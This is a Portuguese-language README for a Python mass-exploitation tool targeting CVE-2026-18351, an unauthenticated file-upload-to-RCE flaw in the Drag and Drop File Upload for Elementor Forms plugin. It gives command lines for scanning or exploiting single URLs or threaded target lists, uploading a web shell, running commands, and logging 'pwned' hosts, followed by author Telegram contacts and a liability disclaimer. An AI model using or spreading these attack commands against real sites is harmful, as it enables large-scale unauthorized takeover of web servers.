Ferramenta de exploração em massa para CVE-2026-18351, um upload arbitrário de arquivos não autenticado para RCE no Elementor Forms <= 1.6.0, com sondagem passiva, upload de shell e execução de comandos.
Ferramenta de exploração em massa para CVE-2026-18351 — Upload Arbitrário de Arquivo Não Autenticado → RCE em Drag and Drop File Upload for Elementor Forms <= 1.6.0.
créditos johenlastgen | telegram @johenlastgen | canal @jlgnetworkredirect
Sem dependências externas — utiliza apenas a biblioteca padrão do Python.
python3 --version # 3.6+
# Alvo único — apenas verificação passiva (sem upload)
python3 mass.py --url http://target.com --check
# Alvo único — exploração com comando padrão (id)
python3 mass.py --url http://target.com --cmd id
# Alvo único — exploração com comando personalizado
python3 mass.py --url http://target.com --cmd whoami
# Múltiplos alvos — verificação passiva
python3 mass.py --list targets.txt --threads 50 --check
# Múltiplos alvos — exploração
python3 mass.py --list targets.txt --threads 50 --cmd id
# Múltiplos alvos — exploração com ajuste de timeout
python3 mass.py --list targets.txt --threads 100 --timeout 8 --cmd whoami
# Salvar log completo
python3 mass.py --list targets.txt --output results.txt
# Salvar apenas alvos vulneráveis
python3 mass.py --list targets.txt --output-vuln vuln.txt
# Salvar apenas alvos com RCE confirmado
python3 mass.py --list targets.txt --output-pwned pwned.txt
# Saída combinada
python3 mass.py \
--list targets.txt \
--threads 50 \
--cmd id \
--output results.txt \
--output-vuln vuln.txt \
--output-pwned pwned.txt
| Opção | Descrição |
|---|---|
--url | URL de alvo único |
--list FILE | Arquivo contendo URLs de alvos (uma por linha) |
--check | Apenas sonda passiva — sem upload de arquivo |
--cmd CMD | Comando a executar no shell (padrão: id) |
--threads N | Número de threads concorrentes (padrão: 20) |
--timeout N | Timeout por requisição em segundos (padrão: 10) |
--output FILE | Salvar log completo em arquivo |
--output-vuln FILE | Salvar apenas URLs de alvos vulneráveis em arquivo |
--output-pwned FILE | Salvar apenas alvos com RCE confirmado em arquivo |
| Estado | Significado |
|---|---|
PWNED | Shell enviado e RCE confirmado |
VULN-NO-EXEC | Upload aceito mas execução do shell falhou |
PATCHED | Upload rejeitado ou nonce não encontrado |
ERROR | Falha de rede ou de parsing |
Uma URL por linha. Linhas iniciadas com # são ignoradas.
http://target1.com
https://target2.com
# this line is ignored
http://target3.com
Este projeto é fornecido exclusivamente para avaliações de segurança autorizadas, pesquisa de segurança defensiva e validação de vulnerabilidades.
Ao utilizar este software, você confirma que possui autorização explícita para avaliar os sistemas alvo. O acesso não autorizado a sistemas computacionais é proibido e pode violar leis aplicáveis.
O autor e os contribuidores não incentivam nem toleram o uso não autorizado deste projeto e não assumem qualquer responsabilidade por qualquer uso indevido, dano ou consequência legal resultante de sua utilização.
JohenLastGen — JLG NETWORK